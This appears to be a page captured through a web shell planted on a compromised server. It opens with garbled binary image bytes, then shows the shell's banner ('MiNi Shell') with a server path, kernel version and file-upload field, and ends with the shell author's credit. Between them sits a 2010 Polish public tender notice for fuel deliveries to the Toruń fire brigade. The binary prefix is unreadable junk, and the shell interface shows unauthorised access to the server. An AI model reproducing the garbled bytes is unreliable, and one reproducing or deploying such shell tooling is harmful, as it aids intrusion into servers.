JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100831/236609-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu</b><br>
<b>Numer ogłoszenia: 236609 - 2010; data zamieszczenia: 31.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Miejska Państwowej Straży Pożarnej w Toruniu , ul. Legionów 70/76, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6119200, faks 056 6119212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.straz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu, w okresie trzyletnim, w następującym zakresie: 

Część I. Komenda Miejska PSP + JRG Nr 1, ul. Legionów 70/76 w Toruniu
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 61000 litrów.
2. benzyny bezołowiowej Pb 95: 3800 litrów.

Część II. JRG Nr 2, ul. Paderewskiego 4 w Toruniu
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 22000 litrów.
2. benzyny bezołowiowej Pb 95: 2900 litrów.

Część III. JRG Nr 3, ul. Olsztyńska 6 w Toruniu
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 35000 litrów.
2. benzyny bezołowiowej Pb 95: 5000 litrów.

Część IV. JRG w Chełmży, ul. Sądowa 2,
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 10000 litrów.
2. benzyny bezołowiowej Pb 95: 2000 litrów.

Razem dla części od I do IV:	olej napędowy ON- 128000 litrów,
	benzyna bezołowiowa Pb 95- 13700 litrów.

Zamawiający zastrzega, iż podane ilości paliw są ilościami szacunkowymi, niezbędnymi do podania zakresu i obliczenia wartości zamówienia. Zamawiający, w przypadku mniejszego zapotrzebowania na paliwa w trzyletnim okresie trwania umowy, dokona zakupów takiej ilości paliw, która zaspokoi jego bieżące potrzeby.

Jednocześnie zastrzega się, że wyczerpanie zamówionego limitu paliw spowoduje wygaśnięcie zawartej umowy w sprawie udzielenia zamówienia publicznego.

Wykonawca może złożyć ofertę częściową na jedną, kilka lub wszystkie części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Zamawiający oceni, czy Wykonawca spełnia warunki, na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków, o których mowa w Rozdziale III  i IV SIWZ.
b. ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca ,,spełnia,, albo ,,nie spełnia,, poszczególnych warunków.  Jeżeli Wykonawca dostarczy dokumenty potwierdzające spełnianie żądanego warunku, Zamawiający zaznaczy żądaną pozycję jako ,,spełnia,,. Jeżeli z dokumentów wynikać będzie, że Wykonawca nie spełnia żądanych warunków lub nie przedstawił na ich potwierdzenie dokumentów, Zamawiający zaznaczy pozycję jako ,,nie spełnia,,.
c. jeżeli Wykonawca nie dołączy do oferty wymaganych oświadczeń i dokumentów lub z treści dołączonych dokumentów nie będzie wynikać, że zostały spełnione wymagane warunki, Zamawiający wykluczy Wykonawcę odpowiednio na podstawie art. 24 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Zamawiający oceni, czy Wykonawca spełnia warunki, na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków, o których mowa w Rozdziale III  i IV SIWZ.
b. ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca ,,spełnia,, albo ,,nie spełnia,, poszczególnych warunków.  Jeżeli Wykonawca dostarczy dokumenty potwierdzające spełnianie żądanego warunku, Zamawiający zaznaczy żądaną pozycję jako ,,spełnia,,. Jeżeli z dokumentów wynikać będzie, że Wykonawca nie spełnia żądanych warunków lub nie przedstawił na ich potwierdzenie dokumentów, Zamawiający zaznaczy pozycję jako ,,nie spełnia,,.
c. jeżeli Wykonawca nie dołączy do oferty wymaganych oświadczeń i dokumentów lub z treści dołączonych dokumentów nie będzie wynikać, że zostały spełnione wymagane warunki, Zamawiający wykluczy Wykonawcę odpowiednio na podstawie art. 24 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Zamawiający oceni, czy Wykonawca spełnia warunki, na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu i na podstawie złożonych wraz z ofertą dokumentów żądanych przez Zamawiającego potwierdzających spełnianie tych warunków, o których mowa w Rozdziale III  i IV SIWZ.
b. ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca ,,spełnia,, albo ,,nie spełnia,, poszczególnych warunków.  Jeżeli Wykonawca dostarczy dokumenty potwierdzające spełnianie żądanego warunku, Zamawiający zaznaczy żądaną pozycję jako ,,spełnia,,. Jeżeli z dokumentów wynikać będzie, że Wykonawca nie spełnia żądanych warunków lub nie przedstawił na ich potwierdzenie dokumentów, Zamawiający zaznaczy pozycję jako ,,nie spełnia,,.
c. jeżeli Wykonawca nie dołączy do oferty wymaganych oświadczeń i dokumentów lub z treści dołączonych dokumentów nie będzie wynikać, że zostały spełnione wymagane warunki, Zamawiający wykluczy Wykonawcę odpowiednio na podstawie art. 24 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. pełnomocnictwo do reprezentowania Wykonawców ubiegających się wspólnie o udzielenie zamówienia, zgodnie z art. 23 ust. 2 ustawy PZP,
2. w przypadku wyboru oferty Wykonawców wspólnie ubiegających się                    o udzielenie zamówienia zobowiązani są oni przed zawarciem umowy w sprawie udzielenia zamówienia publicznego przedłożyć umowę regulującą współpracę tych Wykonawców, zgodnie z art. 23 ust. 4 ustawy PZP.
3. Wykonawca w formularzu oferty (załącznik nr 1 do SIWZ), zobowiązany jest do wskazania nazwy rafinerii, której ceny stanowiły podstawę do przedstawienia oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany ceny detalicznej za 1 litr paliwa zgodnie z poniższym schematem:
1. Cena, która zostanie skalkulowana przez Wykonawcę na podstawie obowiązujących w rafineriach cen hurtowych, powinna być podana za l litr danej kategorii paliwa netto i brutto oraz osobno za całość zamówienia netto i brutto. Jako podstawę do obliczeń należy traktować ceny hurtowe obowiązujące w odpowiedniej dla Wykonawcy rafinerii w dniu 08.09.2010 r. o godzinie 12.00.
2. Zmiany cen paliw.
a) Zamawiający dopuszcza wzrost ceny maksymalnie o kwotę zmiany ceny hurtowej 1 litra danej kategorii paliwa w odpowiedniej dla Wykonawcy rafinerii.
b) jednocześnie w przypadku obniżenia cen hurtowych obowiązujących w odpowiedniej dla Wykonawcy rafinerii, nastąpi obniżenie ceny dla Zamawiającego o kwotę zmiany ceny hurtowej.
3. W przypadku zmiany cen paliwa, korekta następować będzie w postaci aneksu do umowy wystawianego przez Wykonawcę, nie częściej niż raz na dwa tygodnie od dnia zawarcia umowy, którego wzór stanowi załącznik nr 4 do SIWZ. Podstawę do obliczenia stanowić będą ceny obowiązujące w danej rafinerii w dniu wystawiania aneksu, o godzinie 10.00. 
4. W umowie o udzielenie zamówienia publicznego, która zostanie podpisana z Wykonawcą, który wygra przetarg, zostaną zawarte ceny hurtowe obowiązujące w odpowiedniej dla Wykonawcy rafinerii z godziny 10.00. dnia poprzedzającego zawarcie umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.straz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Miejska
Państwowej Straży Pożarnej
w Toruniu
87 - 100 Toruń
ul. Legionów 70/76.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 10:00, miejsce: Sekretariat I piętro Komendy Miejskiej
Państwowej Straży Pożarnej
w Toruniu
87 - 100 Toruń
ul. Legionów 70/76.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu
Część I. Komenda Miejska PSP + JRG Nr 1, ul. Legionów 70/76 w Toruniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie:
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 61000 litrów
2. benzyny bezołowiowej Pb 95: 3800 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu
Część II. JRG Nr 2, ul. Paderewskiego 4 w Toruniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie:
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 22000 litrów
2. benzyny bezołowiowej Pb 95: 2900 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu
Część III. JRG Nr 3, ul. Olsztyńska 6 w Toruniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie:
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 35000 litrów
2. benzyny bezołowiowej Pb 95: 5000 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa paliw płynnych do Komendy Miejskiej PSP w Toruniu
Część IV. JRG w Chełmży, ul. Sądowa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie:
1. oleju napędowego ON (letniego lub zimowego - zależnie od warunków atmosferycznych): 10000 litrów
2. benzyny bezołowiowej Pb 95: 2000 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com